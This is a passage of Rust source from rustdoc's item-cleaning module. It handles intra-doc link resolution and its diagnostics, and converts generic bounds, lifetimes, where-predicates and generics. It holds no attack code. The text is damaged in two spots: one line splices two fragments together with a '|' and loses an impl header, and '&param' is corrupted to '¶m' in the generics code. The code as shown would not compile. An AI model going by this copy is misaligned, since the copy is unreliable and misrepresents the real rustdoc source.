use html::format::href;
self.links.iter().filter_map(|&(ref s, did, ref fragment)| {
match did {
Some(did) => {
if let Some((mut href, ..)) = href(did) {
if let Some(ref fragment) = *fragment {
href.push_str("#");
href.push_str(fragment);
}
Some((s.clone(), href))
} else {
None
}
}
None => {
if let Some(ref fragment) = *fragment {
let cache = cache();
let url = match cache.extern_locations.get(krate) {
Some(&(_, ref src, ExternalLocation::Local)) =>
src.to_str().expect("invalid file path"),
Some(&(_, _, ExternalLocation::Remote(ref s))) => s,
Some(&(_, _, ExternalLocation::Unknown)) | None =>
"https://doc.rust-lang.org/nightly",
};
// This is a primitive so the url is done "by hand".
Some((s.clone(),
format!("{}{}std/primitive.{}.html",
url,
if !url.ends_with('/') { "/" } else { "" },
fragment)))
} else {
panic!("This isn't a primitive?!");
}
}
}
}).collect()
}
}
impl AttributesExt for Attributes {
fn lists<'a>(&'a self, name: &'a str) -> ListAttributesIter<'a> {
self.other_attrs.lists(name)
}
}
/// Given a def, returns its name and disambiguator
/// for a value namespace
///
/// Returns None for things which cannot be ambiguous since
/// they exist in both namespaces (structs and modules)
fn value_ns_kind(def: Def, path_str: &str) -> Option<(&'static str, String)> {
match def {
// structs, variants, and mods exist in both namespaces. skip them
Def::StructCtor(..) | Def::Mod(..) | Def::Variant(..) | Def::VariantCtor(..) => None,
Def::Fn(..)
=> Some(("function", format!("{}()", path_str))),
Def::Method(..)
=> Some(("method", format!("{}()", path_str))),
Def::Const(..)
=> Some(("const", format!("const@{}", path_str))),
Def::Static(..)
=> Some(("static", format!("static@{}", path_str))),
_ => Some(("value", format!("value@{}", path_str))),
}
}
/// Given a def, returns its name, the article to be used, and a disambiguator
/// for the type namespace
fn type_ns_kind(def: Def, path_str: &str) -> (&'static str, &'static str, String) {
let (kind, article) = match def {
// we can still have non-tuple structs
Def::Struct(..) => ("struct", "a"),
Def::Enum(..) => ("enum", "an"),
Def::Trait(..) => ("trait", "a"),
Def::Union(..) => ("union", "a"),
_ => ("type", "a"),
};
(kind, article, format!("{}@{}", kind, path_str))
}
fn span_of_attrs(attrs: &Attributes) -> syntax_pos::Span {
if attrs.doc_strings.is_empty() {
return DUMMY_SP;
}
let start = attrs.doc_strings[0].span();
let end = attrs.doc_strings.last().unwrap().span();
start.to(end)
}
fn ambiguity_error(cx: &DocContext, attrs: &Attributes,
path_str: &str,
article1: &str, kind1: &str, disambig1: &str,
article2: &str, kind2: &str, disambig2: &str) {
let sp = span_of_attrs(attrs);
cx.sess()
.struct_span_warn(sp,
&format!("`{}` is both {} {} and {} {}",
path_str, article1, kind1,
article2, kind2))
.help(&format!("try `{}` if you want to select the {}, \
or `{}` if you want to \
select the {}",
disambig1, kind1, disambig2,
kind2))
.emit();
}
/// Given an enum variant's def, return the def of its enum and the associated fragment
fn handle_variant(cx: &DocContext, def: Def) -> Result<(Def, Option<String>), ()> {
use rustc::ty::DefIdTree;
let parent = if let Some(parent) = cx.tcx.parent(def.def_id()) {
parent
} else {
return Err(())
};
let parent_def = Def::Enum(parent);
let variant = cx.tcx.expect_variant_def(def);
Ok((parent_def, Some(format!("{}.v", variant.name))))
}
const PRIMITIVES: &[(&str, Def)] = &[
("u8", Def::PrimTy(hir::PrimTy::TyUint(syntax::ast::UintTy::U8))),
("u16", Def::PrimTy(hir::PrimTy::TyUint(syntax::ast::UintTy::U16))),
("u32", Def::PrimTy(hir::PrimTy::TyUint(syntax::ast::UintTy::U32))),
("u64", Def::PrimTy(hir::PrimTy::TyUint(syntax::ast::UintTy::U64))),
("u128", Def::PrimTy(hir::PrimTy::TyUint(syntax::ast::UintTy::U128))),
("usize", Def::PrimTy(hir::PrimTy::TyUint(syntax::ast::UintTy::Usize))),
("i8", Def::PrimTy(hir::PrimTy::TyInt(syntax::ast::IntTy::I8))),
("i16", Def::PrimTy(hir::PrimTy::TyInt(syntax::ast::IntTy::I16))),
("i32", Def::PrimTy(hir::PrimTy::TyInt(syntax::ast::IntTy::I32))),
("i64", Def::PrimTy(hir::PrimTy::TyInt(syntax::ast::IntTy::I64))),
("i128", Def::PrimTy(hir::PrimTy::TyInt(syntax::ast::IntTy::I128))),
("isize", Def::PrimTy(hir::PrimTy::TyInt(syntax::ast::IntTy::Isize))),
("f32", Def::PrimTy(hir::PrimTy::TyFloat(syntax::ast::FloatTy::F32))),
("f64", Def::PrimTy(hir::PrimTy::TyFloat(syntax::ast::FloatTy::F64))),
("str", Def::PrimTy(hir::PrimTy::TyStr)),
("bool", Def::PrimTy(hir::PrimTy::TyBool)),
("char", Def::PrimTy(hir::PrimTy::TyChar)),
];
fn is_primitive(path_str: &str, is_val: bool) -> Option<Def> {
if is_val {
None
} else {
PRIMITIVES.iter().find(|x| x.0 == path_str).map(|x| x.1)
}
}
/// Resolve a given string as a path, along with whether or not it is
/// in the value namespace. Also returns an optional URL fragment in the case
/// of variants and methods
fn resolve(cx: &DocContext, path_str: &str, is_val: bool) -> Result<(Def, Option<String>), ()> {
// In case we're in a module, try to resolve the relative
// path
if let Some(id) = cx.mod_ids.borrow().last() {
let result = cx.resolver.borrow_mut()
.with_scope(*id,
|resolver| {
resolver.resolve_str_path_error(DUMMY_SP,
&path_str, is_val)
});
if let Ok(result) = result {
// In case this is a trait item, skip the
// early return and try looking for the trait
let value = match result.def {
Def::Method(_) | Def::AssociatedConst(_) => true,
Def::AssociatedTy(_) => false,
Def::Variant(_) => return handle_variant(cx, result.def),
// not a trait item, just return what we found
_ => return Ok((result.def, None))
};
if value != is_val {
return Err(())
}
} else if let Some(prim) = is_primitive(path_str, is_val) {
return Ok((prim, Some(path_str.to_owned())))
} else {
// If resolution failed, it may still be a method
// because methods are not handled by the resolver
// If so, bail when we're not looking for a value
if !is_val {
return Err(())
}
}
// Try looking for methods and associated items
let mut split = path_str.rsplitn(2, "::");
let mut item_name = if let Some(first) = split.next() {
first
} else {
return Err(())
};
let mut path = if let Some(second) = split.next() {
second
} else {
return Err(())
};
let ty = cx.resolver.borrow_mut()
.with_scope(*id,
|resolver| {
resolver.resolve_str_path_error(DUMMY_SP, &path, false)
})?;
match ty.def {
Def::Struct(did) | Def::Union(did) | Def::Enum(did) | Def::TyAlias(did) => {
let item = cx.tcx.inherent_impls(did).iter()
.flat_map(|imp| cx.tcx.associated_items(*imp))
.find(|item| item.ident.name == item_name);
if let Some(item) = item {
let out = match item.kind {
ty::AssociatedKind::Method if is_val => "method",
ty::AssociatedKind::Const if is_val => "associatedconstant",
_ => return Err(())
};
Ok((ty.def, Some(format!("{}.{}", out, item_name))))
} else {
let is_enum = match ty.def {
Def::Enum(_) => true,
_ => false,
};
let elem = if is_enum {
cx.tcx.adt_def(did).all_fields().find(|item| item.ident.name == item_name)
} else {
cx.tcx.adt_def(did)
.non_enum_variant()
.fields
.iter()
.find(|item| item.ident.name == item_name)
};
if let Some(item) = elem {
Ok((ty.def,
Some(format!("{}.{}",
if is_enum { "variant" } else { "structfield" },
item.ident))))
} else {
Err(())
}
}
}
Def::Trait(did) => {
let item = cx.tcx.associated_item_def_ids(did).iter()
.map(|item| cx.tcx.associated_item(*item))
.find(|item| item.ident.name == item_name);
if let Some(item) = item {
let kind = match item.kind {
ty::AssociatedKind::Const if is_val => "associatedconstant",
ty::AssociatedKind::Type if !is_val => "associatedtype",
ty::AssociatedKind::Method if is_val => {
if item.defaultness.has_value() {
"method"
} else {
"tymethod"
}
}
_ => return Err(())
};
Ok((ty.def, Some(format!("{}.{}", kind, item_name))))
} else {
Err(())
}
}
_ => Err(())
}
} else {
Err(())
}
}
/// Resolve a string as a macro
fn macro_resolve(cx: &DocContext, path_str: &str) -> Option<Def> {
use syntax::ext::base::{MacroKind, SyntaxExtension};
use syntax::ext::hygiene::Mark;
let segment = ast::PathSegment::from_ident(Ident::from_str(path_str));
let path = ast::Path { segments: vec![segment], span: DUMMY_SP };
let mut resolver = cx.resolver.borrow_mut();
let mark = Mark::root();
let res = resolver
.resolve_macro_to_def_inner(mark, &path, MacroKind::Bang, false);
if let Ok(def) = res {
if let SyntaxExtension::DeclMacro { .. } = *resolver.get_macro(def) {
Some(def)
} else {
None
}
} else if let Some(def) = resolver.all_macros.get(&Symbol::intern(path_str)) {
Some(*def)
} else {
None
}
}
#[derive(Debug)]
enum PathKind {
/// can be either value or type, not a macro
Unknown,
/// macro
Macro,
/// values, functions, consts, statics, everything in the value namespace
Value,
/// types, traits, everything in the type namespace
Type,
}
fn resolution_failure(
cx: &DocContext,
attrs: &Attributes,
path_str: &str,
dox: &str,
link_range: Option<Range<usize>>,
) {
let sp = span_of_attrs(attrs);
let msg = format!("`[{}]` cannot be resolved, ignoring it...", path_str);
let code_dox = sp.to_src(cx);
let doc_comment_padding = 3;
let mut diag = if let Some(link_range) = link_range {
// blah blah blah\nblah\nblah [blah] blah blah\nblah blah
// ^ ~~~~~~
// | link_range
// last_new_line_offset
let mut diag;
if dox.lines().count() == code_dox.lines().count() {
let line_offset = dox[..link_range.start].lines().count();
// The span starts in the `///`, so we don't have to account for the leading whitespace
let code_dox_len = if line_offset <= 1 {
doc_comment_padding
} else {
// The first `///`
doc_comment_padding +
// Each subsequent leading whitespace and `///`
code_dox.lines().skip(1).take(line_offset - 1).fold(0, |sum, line| {
sum + doc_comment_padding + line.len() - line.trim().len()
})
};
// Extract the specific span
let sp = sp.from_inner_byte_pos(
link_range.start + code_dox_len,
link_range.end + code_dox_len,
);
diag = cx.tcx.struct_span_lint_node(lint::builtin::INTRA_DOC_LINK_RESOLUTION_FAILURE,
NodeId::new(0),
sp,
&msg);
diag.span_label(sp, "cannot be resolved, ignoring");
} else {
diag = cx.tcx.struct_span_lint_node(lint::builtin::INTRA_DOC_LINK_RESOLUTION_FAILURE,
NodeId::new(0),
sp,
&msg);
let last_new_line_offset = dox[..link_range.start].rfind('\n').map_or(0, |n| n + 1);
let line = dox[last_new_line_offset..].lines().next().unwrap_or("");
// Print the line containing the `link_range` and manually mark it with '^'s
diag.note(&format!(
"the link appears in this line:\n\n{line}\n\
{indicator: <before$}{indicator:^<found$}",
line=line,
indicator="",
before=link_range.start - last_new_line_offset,
found=link_range.len(),
));
}
diag
} else {
cx.tcx.struct_span_lint_node(lint::builtin::INTRA_DOC_LINK_RESOLUTION_FAILURE,
NodeId::new(0),
sp,
&msg)
};
diag.help("to escape `[` and `]` characters, just add '\\' before them like \
`\\[` or `\\]`");
diag.emit();
}
impl Clean<Attributes> for [ast::Attribute] {
fn clean(&self, cx: &DocContext) -> Attributes {
let mut attrs = Attributes::from_ast(cx.sess().diagnostic(), self);
if UnstableFeatures::from_environment().is_nightly_build() {
let dox = attrs.collapsed_doc_value().unwrap_or_else(String::new);
for (ori_link, link_range) in markdown_links(&dox) {
// bail early for real links
if ori_link.contains('/') {
continue;
}
let link = ori_link.replace("`", "");
let (def, fragment) = {
let mut kind = PathKind::Unknown;
let path_str = if let Some(prefix) =
["struct@", "enum@", "type@",
"trait@", "union@"].iter()
.find(|p| link.starts_with(**p)) {
kind = PathKind::Type;
link.trim_left_matches(prefix)
} else if let Some(prefix) =
["const@", "static@",
"value@", "function@", "mod@",
"fn@", "module@", "method@"]
.iter().find(|p| link.starts_with(**p)) {
kind = PathKind::Value;
link.trim_left_matches(prefix)
} else if link.ends_with("()") {
kind = PathKind::Value;
link.trim_right_matches("()")
} else if link.starts_with("macro@") {
kind = PathKind::Macro;
link.trim_left_matches("macro@")
} else if link.ends_with('!') {
kind = PathKind::Macro;
link.trim_right_matches('!')
} else {
&link[..]
}.trim();
if path_str.contains(|ch: char| !(ch.is_alphanumeric() ||
ch == ':' || ch == '_')) {
continue;
}
match kind {
PathKind::Value => {
if let Ok(def) = resolve(cx, path_str, true) {
def
} else {
resolution_failure(cx, &attrs, path_str, &dox, link_range);
// this could just be a normal link or a broken link
// we could potentially check if something is
// "intra-doc-link-like" and warn in that case
continue;
}
}
PathKind::Type => {
if let Ok(def) = resolve(cx, path_str, false) {
def
} else {
resolution_failure(cx, &attrs, path_str, &dox, link_range);
// this could just be a normal link
continue;
}
}
PathKind::Unknown => {
// try everything!
if let Some(macro_def) = macro_resolve(cx, path_str) {
if let Ok(type_def) = resolve(cx, path_str, false) {
let (type_kind, article, type_disambig)
= type_ns_kind(type_def.0, path_str);
ambiguity_error(cx, &attrs, path_str,
article, type_kind, &type_disambig,
"a", "macro", &format!("macro@{}", path_str));
continue;
} else if let Ok(value_def) = resolve(cx, path_str, true) {
let (value_kind, value_disambig)
= value_ns_kind(value_def.0, path_str)
.expect("struct and mod cases should have been \
caught in previous branch");
ambiguity_error(cx, &attrs, path_str,
"a", value_kind, &value_disambig,
"a", "macro", &format!("macro@{}", path_str));
}
(macro_def, None)
} else if let Ok(type_def) = resolve(cx, path_str, false) {
// It is imperative we search for not-a-value first
// Otherwise we will find struct ctors for when we are looking
// for structs, and the link won't work.
// if there is something in both namespaces
if let Ok(value_def) = resolve(cx, path_str, true) {
let kind = value_ns_kind(value_def.0, path_str);
if let Some((value_kind, value_disambig)) = kind {
let (type_kind, article, type_disambig)
= type_ns_kind(type_def.0, path_str);
ambiguity_error(cx, &attrs, path_str,
article, type_kind, &type_disambig,
"a", value_kind, &value_disambig);
continue;
}
}
type_def
} else if let Ok(value_def) = resolve(cx, path_str, true) {
value_def
} else {
resolution_failure(cx, &attrs, path_str, &dox, link_range);
// this could just be a normal link
continue;
}
}
PathKind::Macro => {
if let Some(def) = macro_resolve(cx, path_str) {
(def, None)
} else {
resolution_failure(cx, &attrs, path_str, &dox, link_range);
continue
}
}
}
};
if let Def::PrimTy(_) = def {
attrs.links.push((ori_link, None, fragment));
} else {
let id = register_def(cx, def);
attrs.links.push((ori_link, Some(id), fragment));
}
}
cx.sess().abort_if_errors();
}
attrs
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub enum GenericBound {
TraitBound(PolyTrait, hir::TraitBoundModifier),
Outlives(Lifetime),
}
impl GenericBound {
fn maybe_sized(cx: &DocContext) -> GenericBound {
let did = cx.tcx.require_lang_item(lang_items::SizedTraitLangItem);
let empty = cx.tcx.intern_substs(&[]);
let path = external_path(cx, &cx.tcx.item_name(did).as_str(),
Some(did), false, vec![], empty);
inline::record_extern_fqn(cx, did, TypeKind::Trait);
GenericBound::TraitBound(PolyTrait {
trait_: ResolvedPath {
path,
typarams: None,
did,
is_generic: false,
},
generic_params: Vec::new(),
}, hir::TraitBoundModifier::Maybe)
}
fn is_sized_bound(&self, cx: &DocContext) -> bool {
use rustc::hir::TraitBoundModifier as TBM;
if let GenericBound::TraitBound(PolyTrait { ref trait_, .. }, TBM::None) = *self {
if trait_.def_id() == cx.tcx.lang_items().sized_trait() {
return true;
}
}
false
}
fn get_poly_trait(&self) -> Option<PolyTrait> {
if let GenericBound::TraitBound(ref p, _) = *self {
return Some(p.clone())
}
None
}
fn get_trait_type(&self) -> Option<Type> {
if let GenericBound::TraitBound(PolyTrait { ref trait_, .. }, _) = *self {
return Some(trait_.clone());
}
None
}
}
impl Clean<GenericBound> for hir::GenericBound {
fn clean(&self, cx: &DocContext) -> GenericBound {
match *self {
hir::GenericBound::Outlives(lt) => GenericBound::Outlives(lt.clean(cx)),
hir::GenericBound::Trait(ref t, modifier) => {
GenericBound::TraitBound(t.clean(cx), modifier)
}
}
}
}
fn external_generic_args(cx: &DocContext, trait_did: Option<DefId>, has_self: bool,
bindings: Vec<TypeBinding>, substs: &Substs) -> GenericArgs {
let lifetimes = substs.regions().filter_map(|v| v.clean(cx)).collect();
let types = substs.types().skip(has_self as usize).collect::<Vec<_>>();
match trait_did {
// Attempt to sugar an external path like Fn<(A, B,), C> to Fn(A, B) -> C
Some(did) if cx.tcx.lang_items().fn_trait_kind(did).is_some() => {
assert_eq!(types.len(), 1);
let inputs = match types[0].sty {
ty::TyTuple(ref tys) => tys.iter().map(|t| t.clean(cx)).collect(),
_ => {
return GenericArgs::AngleBracketed {
lifetimes,
types: types.clean(cx),
bindings,
}
}
};
let output = None;
// FIXME(#20299) return type comes from a projection now
// match types[1].sty {
// ty::TyTuple(ref v) if v.is_empty() => None, // -> ()
// _ => Some(types[1].clean(cx))
// };
GenericArgs::Parenthesized {
inputs,
output,
}
},
_ => {
GenericArgs::AngleBracketed {
lifetimes,
types: types.clean(cx),
bindings,
}
}
}
}
// trait_did should be set to a trait's DefId if called on a TraitRef, in order to sugar
// from Fn<(A, B,), C> to Fn(A, B) -> C
fn external_path(cx: &DocContext, name: &str, trait_did: Option<DefId>, has_self: bool,
bindings: Vec<TypeBinding>, substs: &Substs) -> Path {
Path {
global: false,
def: Def::Err,
segments: vec![PathSegment {
name: name.to_string(),
args: external_generic_args(cx, trait_did, has_self, bindings, substs)
}],
}
}
impl<'a, 'tcx> Clean<GenericBound> for (&'a ty::TraitRef<'tcx>, Vec<TypeBinding>) {
fn clean(&self, cx: &DocContext) -> GenericBound {
let (trait_ref, ref bounds) = *self;
inline::record_extern_fqn(cx, trait_ref.def_id, TypeKind::Trait);
let path = external_path(cx, &cx.tcx.item_name(trait_ref.def_id).as_str(),
Some(trait_ref.def_id), true, bounds.clone(), trait_ref.substs);
debug!("ty::TraitRef\n subst: {:?}\n", trait_ref.substs);
// collect any late bound regions
let mut late_bounds = vec![];
for ty_s in trait_ref.input_types().skip(1) {
if let ty::TyTuple(ts) = ty_s.sty {
for &ty_s in ts {
if let ty::TyRef(ref reg, _, _) = ty_s.sty {
if let &ty::RegionKind::ReLateBound(..) = *reg {
debug!(" hit an ReLateBound {:?}", reg);
if let Some(Lifetime(name)) = reg.clean(cx) {
late_bounds.push(GenericParamDef {
name,
kind: GenericParamDefKind::Lifetime,
});
}
}
}
}
}
}
GenericBound::TraitBound(
PolyTrait {
trait_: ResolvedPath {
path,
typarams: None,
did: trait_ref.def_id,
is_generic: false,
},
generic_params: late_bounds,
},
hir::TraitBoundModifier::None
)
}
}
impl<'tcx> Clean<GenericBound> for ty::TraitRef<'tcx> {
fn clean(&self, cx: &DocContext) -> GenericBound {
(self, vec![]).clean(cx)
} | fn clean(&self, cx: &DocContext) -> Option<Vec<GenericBound>> {
let mut v = Vec::new();
v.extend(self.regions().filter_map(|r| r.clean(cx)).map(GenericBound::Outlives));
v.extend(self.types().map(|t| GenericBound::TraitBound(PolyTrait {
trait_: t.clean(cx),
generic_params: Vec::new(),
}, hir::TraitBoundModifier::None)));
if !v.is_empty() {Some(v)} else {None}
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub struct Lifetime(String);
impl Lifetime {
pub fn get_ref<'a>(&'a self) -> &'a str {
let Lifetime(ref s) = *self;
let s: &'a str = s;
s
}
pub fn statik() -> Lifetime {
Lifetime("'static".to_string())
}
}
impl Clean<Lifetime> for hir::Lifetime {
fn clean(&self, cx: &DocContext) -> Lifetime {
if self.id != ast::DUMMY_NODE_ID {
let hir_id = cx.tcx.hir.node_to_hir_id(self.id);
let def = cx.tcx.named_region(hir_id);
match def {
Some(rl::Region::EarlyBound(_, node_id, _)) |
Some(rl::Region::LateBound(_, node_id, _)) |
Some(rl::Region::Free(_, node_id)) => {
if let Some(lt) = cx.lt_substs.borrow().get(&node_id).cloned() {
return lt;
}
}
_ => {}
}
}
Lifetime(self.name.ident().to_string())
}
}
impl Clean<Lifetime> for hir::GenericParam {
fn clean(&self, _: &DocContext) -> Lifetime {
match self.kind {
hir::GenericParamKind::Lifetime { .. } => {
if self.bounds.len() > 0 {
let mut bounds = self.bounds.iter().map(|bound| match bound {
hir::GenericBound::Outlives(lt) => lt,
_ => panic!(),
});
let name = bounds.next().unwrap().name.ident();
let mut s = format!("{}: {}", self.name.ident(), name);
for bound in bounds {
s.push_str(&format!(" + {}", bound.name.ident()));
}
Lifetime(s)
} else {
Lifetime(self.name.ident().to_string())
}
}
_ => panic!(),
}
}
}
impl<'tcx> Clean<Lifetime> for ty::GenericParamDef {
fn clean(&self, _cx: &DocContext) -> Lifetime {
Lifetime(self.name.to_string())
}
}
impl Clean<Option<Lifetime>> for ty::RegionKind {
fn clean(&self, cx: &DocContext) -> Option<Lifetime> {
match *self {
ty::ReStatic => Some(Lifetime::statik()),
ty::ReLateBound(_, ty::BrNamed(_, name)) => Some(Lifetime(name.to_string())),
ty::ReEarlyBound(ref data) => Some(Lifetime(data.name.clean(cx))),
ty::ReLateBound(..) |
ty::ReFree(..) |
ty::ReScope(..) |
ty::ReVar(..) |
ty::ReSkolemized(..) |
ty::ReEmpty |
ty::ReClosureBound(_) |
ty::ReCanonical(_) |
ty::ReErased => None
}
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub enum WherePredicate {
BoundPredicate { ty: Type, bounds: Vec<GenericBound> },
RegionPredicate { lifetime: Lifetime, bounds: Vec<GenericBound> },
EqPredicate { lhs: Type, rhs: Type },
}
impl Clean<WherePredicate> for hir::WherePredicate {
fn clean(&self, cx: &DocContext) -> WherePredicate {
match *self {
hir::WherePredicate::BoundPredicate(ref wbp) => {
WherePredicate::BoundPredicate {
ty: wbp.bounded_ty.clean(cx),
bounds: wbp.bounds.clean(cx)
}
}
hir::WherePredicate::RegionPredicate(ref wrp) => {
WherePredicate::RegionPredicate {
lifetime: wrp.lifetime.clean(cx),
bounds: wrp.bounds.clean(cx)
}
}
hir::WherePredicate::EqPredicate(ref wrp) => {
WherePredicate::EqPredicate {
lhs: wrp.lhs_ty.clean(cx),
rhs: wrp.rhs_ty.clean(cx)
}
}
}
}
}
impl<'a> Clean<WherePredicate> for ty::Predicate<'a> {
fn clean(&self, cx: &DocContext) -> WherePredicate {
use rustc::ty::Predicate;
match *self {
Predicate::Trait(ref pred) => pred.clean(cx),
Predicate::Subtype(ref pred) => pred.clean(cx),
Predicate::RegionOutlives(ref pred) => pred.clean(cx),
Predicate::TypeOutlives(ref pred) => pred.clean(cx),
Predicate::Projection(ref pred) => pred.clean(cx),
Predicate::WellFormed(_) => panic!("not user writable"),
Predicate::ObjectSafe(_) => panic!("not user writable"),
Predicate::ClosureKind(..) => panic!("not user writable"),
Predicate::ConstEvaluatable(..) => panic!("not user writable"),
}
}
}
impl<'a> Clean<WherePredicate> for ty::TraitPredicate<'a> {
fn clean(&self, cx: &DocContext) -> WherePredicate {
WherePredicate::BoundPredicate {
ty: self.trait_ref.self_ty().clean(cx),
bounds: vec![self.trait_ref.clean(cx)]
}
}
}
impl<'tcx> Clean<WherePredicate> for ty::SubtypePredicate<'tcx> {
fn clean(&self, _cx: &DocContext) -> WherePredicate {
panic!("subtype predicates are an internal rustc artifact \
and should not be seen by rustdoc")
}
}
impl<'tcx> Clean<WherePredicate> for ty::OutlivesPredicate<ty::Region<'tcx>, ty::Region<'tcx>> {
fn clean(&self, cx: &DocContext) -> WherePredicate {
let ty::OutlivesPredicate(ref a, ref b) = *self;
WherePredicate::RegionPredicate {
lifetime: a.clean(cx).unwrap(),
bounds: vec![GenericBound::Outlives(b.clean(cx).unwrap())]
}
}
}
impl<'tcx> Clean<WherePredicate> for ty::OutlivesPredicate<Ty<'tcx>, ty::Region<'tcx>> {
fn clean(&self, cx: &DocContext) -> WherePredicate {
let ty::OutlivesPredicate(ref ty, ref lt) = *self;
WherePredicate::BoundPredicate {
ty: ty.clean(cx),
bounds: vec![GenericBound::Outlives(lt.clean(cx).unwrap())]
}
}
}
impl<'tcx> Clean<WherePredicate> for ty::ProjectionPredicate<'tcx> {
fn clean(&self, cx: &DocContext) -> WherePredicate {
WherePredicate::EqPredicate {
lhs: self.projection_ty.clean(cx),
rhs: self.ty.clean(cx)
}
}
}
impl<'tcx> Clean<Type> for ty::ProjectionTy<'tcx> {
fn clean(&self, cx: &DocContext) -> Type {
let trait_ = match self.trait_ref(cx.tcx).clean(cx) {
GenericBound::TraitBound(t, _) => t.trait_,
GenericBound::Outlives(_) => panic!("cleaning a trait got a lifetime"),
};
Type::QPath {
name: cx.tcx.associated_item(self.item_def_id).ident.name.clean(cx),
self_type: box self.self_ty().clean(cx),
trait_: box trait_
}
}
}
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub enum GenericParamDefKind {
Lifetime,
Type {
did: DefId,
bounds: Vec<GenericBound>,
default: Option<Type>,
synthetic: Option<hir::SyntheticTyParamKind>,
},
}
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub struct GenericParamDef {
pub name: String,
pub kind: GenericParamDefKind,
}
impl GenericParamDef {
pub fn is_synthetic_type_param(&self) -> bool {
match self.kind {
GenericParamDefKind::Lifetime => false,
GenericParamDefKind::Type { ref synthetic, .. } => synthetic.is_some(),
}
}
}
impl<'tcx> Clean<GenericParamDef> for ty::GenericParamDef {
fn clean(&self, cx: &DocContext) -> GenericParamDef {
let (name, kind) = match self.kind {
ty::GenericParamDefKind::Lifetime => {
(self.name.to_string(), GenericParamDefKind::Lifetime)
}
ty::GenericParamDefKind::Type { has_default, .. } => {
cx.renderinfo.borrow_mut().external_typarams
.insert(self.def_id, self.name.clean(cx));
let default = if has_default {
Some(cx.tcx.type_of(self.def_id).clean(cx))
} else {
None
};
(self.name.clean(cx), GenericParamDefKind::Type {
did: self.def_id,
bounds: vec![], // These are filled in from the where-clauses.
default,
synthetic: None,
})
}
};
GenericParamDef {
name,
kind,
}
}
}
impl Clean<GenericParamDef> for hir::GenericParam {
fn clean(&self, cx: &DocContext) -> GenericParamDef {
let (name, kind) = match self.kind {
hir::GenericParamKind::Lifetime { .. } => {
let name = if self.bounds.len() > 0 {
let mut bounds = self.bounds.iter().map(|bound| match bound {
hir::GenericBound::Outlives(lt) => lt,
_ => panic!(),
});
let name = bounds.next().unwrap().name.ident();
let mut s = format!("{}: {}", self.name.ident(), name);
for bound in bounds {
s.push_str(&format!(" + {}", bound.name.ident()));
}
s
} else {
self.name.ident().to_string()
};
(name, GenericParamDefKind::Lifetime)
}
hir::GenericParamKind::Type { ref default, synthetic, .. } => {
(self.name.ident().name.clean(cx), GenericParamDefKind::Type {
did: cx.tcx.hir.local_def_id(self.id),
bounds: self.bounds.clean(cx),
default: default.clean(cx),
synthetic: synthetic,
})
}
};
GenericParamDef {
name,
kind,
}
}
}
// maybe use a Generic enum and use Vec<Generic>?
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Default, Hash)]
pub struct Generics {
pub params: Vec<GenericParamDef>,
pub where_predicates: Vec<WherePredicate>,
}
impl Clean<Generics> for hir::Generics {
fn clean(&self, cx: &DocContext) -> Generics {
// Synthetic type-parameters are inserted after normal ones.
// In order for normal parameters to be able to refer to synthetic ones,
// scans them first.
fn is_impl_trait(param: &hir::GenericParam) -> bool {
match param.kind {
hir::GenericParamKind::Type { synthetic, .. } => {
synthetic == Some(hir::SyntheticTyParamKind::ImplTrait)
}
_ => false,
}
}
let impl_trait_params = self.params
.iter()
.filter(|param| is_impl_trait(param))
.map(|param| {
let param: GenericParamDef = param.clean(cx);
match param.kind {
GenericParamDefKind::Lifetime => unreachable!(),
GenericParamDefKind::Type { did, ref bounds, .. } => {
cx.impl_trait_bounds.borrow_mut().insert(did, bounds.clone());
}
}
param
})
.collect::<Vec<_>>();
let mut params = Vec::with_capacity(self.params.len());
for p in self.params.iter().filter(|p| !is_impl_trait(p)) {
let p = p.clean(cx);
params.push(p);
}
params.extend(impl_trait_params);
let mut generics = Generics {
params,
where_predicates: self.where_clause.predicates.clean(cx),
};
// Some duplicates are generated for ?Sized bounds between type params and where
// predicates. The point in here is to move the bounds definitions from type params
// to where predicates when such cases occur.
for where_pred in &mut generics.where_predicates {
match *where_pred {
WherePredicate::BoundPredicate { ty: Generic(ref name), ref mut bounds } => {
if bounds.is_empty() {
for param in &mut generics.params {
match param.kind {
GenericParamDefKind::Lifetime => {}
GenericParamDefKind::Type { bounds: ref mut ty_bounds, .. } => {
if ¶m.name == name {
mem::swap(bounds, ty_bounds);
break
}
}
}
}
}
}
_ => continue,
}
}
generics
}
}
impl<'a, 'tcx> Clean<Generics> for (&'a ty::Generics,
&'a ty::GenericPredicates<'tcx>) {
fn clean(&self, cx: &DocContext) -> Generics {
use self::WherePredicate as WP;
let (gens, preds) = *self;
// Bounds in the type_params and lifetimes fields are repeated in the
// predicates field (see rustc_typeck::collect::ty_generics), so remove
// them.
let stripped_typarams = gens.params.iter().filter_map(|param| match param.kind {
ty::GenericParamDefKind::Lifetime => None,
ty::GenericParamDefKind::Type { .. } => {
if param.name == keywords::SelfType.name().as_str() {
assert_eq!(param.index, 0);
return None;
}
Some(param.clean(cx))
}
}).collect::<Vec<GenericParamDef>>();
let mut where_predicates = preds.predicates.to_vec().clean(cx);
// Type parameters and have a Sized bound by default unless removed with
// ?Sized. Scan through the predicates and mark any type parameter with
// a Sized bound, removing the bounds as we find them.
//
// Note that associated types also have a sized bound by default, but we
// don't actually know the set of associated types right here so that's
// handled in cleaning associated types
let mut sized_params = FxHashSet();
where_predicates.retain(|pred| {
match *pred {
WP::BoundPredicate { ty: Generic(ref g), ref bounds } => {
if bounds.iter().any(|b| b.is_sized_bound(cx)) {
sized_params.insert(g.clone());
false
} else {
true
}
}
_ => true,
}
});
// Run through the type parameters again and insert a ?Sized
// unbound for any we didn't find to be Sized.
for tp in &stripped_typarams {
if !sized_params.contains(&tp.name) {
where_predicates.push(WP::BoundPredicate {
ty: Type::Generic(tp.name.clone()),
bounds: vec![GenericBound::maybe_sized(cx)],
})
}
}
// It would be nice to collect all of the bounds on a type and recombine
// them if possible, to avoid e.g. `where T: Foo, T: Bar, T: Sized, T: 'a`
// and instead see `where T: Foo + Bar + Sized + 'a`
Generics {
params: gens.params
.iter()
.flat_map(|param| match param.kind {
ty::GenericParamDefKind::Lifetime => Some(param.clean(cx)),
